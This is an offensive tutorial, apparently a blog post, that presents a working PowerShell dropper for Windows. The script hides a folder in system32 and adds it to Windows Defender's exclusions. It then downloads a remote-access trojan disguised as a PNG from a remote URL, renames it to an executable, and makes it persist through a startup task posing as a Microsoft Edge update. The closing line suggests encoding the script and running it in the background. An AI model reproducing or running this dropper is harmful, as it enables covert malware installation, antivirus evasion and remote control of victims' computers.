Introduction
In this article, we’ll see how to build a simple Dropper to add your own malware to Windows Defender’s exclusions path.
Scan time + execution time bypass
Manage Defender With PowerShell
For more information you can get a list of commands for powershell like this see this link
Can PowerShell Disable Windows Defender ?
Set-MpPreference -DisableRealtimeMonitoring $falseYes, we can disable the defender with this command, but it doesn’t work, because to use the attacker to launch the payload and … if we use the registry and group policy for disable Defender it pattern by our Defender And Prevent to execute and alert, we can’t disable it with powershell, but we can add our own (file,folder,drive,process,…) to exclusions path and execute our malware
Code
we need add-MpPreference or set-MpPreference command to add our malware to defender exclusions path and i change exe extension to png for upload my RAT
$win_dir = $env:windir
$path = "exclusions"
if (Test-Path -Path "$win_dir\system32\$path") {
break
}
else {
mkdir -Path "$win_dir\system32\" -Name $path -Force
attrib +h +s +r "$win_dir\system32\$path"
add-MpPreference -ExclusionPath "$win_dir\system32\$path"
$url = "https://upload/files/c_das.png"
$dest = "$win_dir\system32\$path"
Start-BitsTransfer -Source $url -Destination $dest
Rename-Item -Path "$dest\c_das.png" -NewName "$dest\access.exe"
$action = New-ScheduledTaskAction -Execute "$win_dir\system32\$path\access.exe"
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS" -TaskPath "\" -Action $action -Trigger $trigger
Start-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskMachineUAS"
}not need do anything but better encode and convert to exe run in background (:
